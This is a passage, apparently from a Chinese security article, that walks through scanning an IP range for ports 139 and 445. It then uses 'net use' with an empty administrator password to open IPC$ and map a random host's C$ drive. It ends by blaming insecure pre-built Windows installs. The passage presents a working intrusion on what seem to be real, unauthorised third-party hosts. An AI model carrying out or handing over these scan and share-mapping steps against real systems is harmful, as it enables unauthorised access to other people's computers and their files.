2、IPC$测试(139 445端口)

　　第一步：在命令提示符下运行s扫描器，敲入如下命令：

　　s syn **.1**.133.1 **.1**.138.254 139 445

　　同样时间很短，结果马上出来了，开445端口的比3389的更多，粗略算了一下，超过80%，让人大跌眼镜的是这些主机3389、135都开放!(图4)

图4

　　第二步：随机找一个ip，在“命令提示符”下运行如下命令：

　　net use \\**.1**.135.253\ipc$ "" /user:administrator

　　提示“命令成功完成”

　　继续敲入命令：

　　net use z: \\**.1**.135.253\c$

　　提示“命令成功完成”(图5)

图5

　　这样就把它的系统盘映射到本机，检测到此为止。都到了这一步还有什么不能做的呢，这台主机就算系统沦陷了。

　　分析：这也是“ghost系统”或“电脑城系统”的后遗症，于管理员组的两个用户“administrator”、“new”都为空密码。电脑用户缺乏基本的电脑安全意识，更没有防范意识，请有方面的人来进行配置，系统安装完成不做任何配置就上网逛了，能不被黑吗?

上一页  [1] [2] [3] [4] [5] 下一页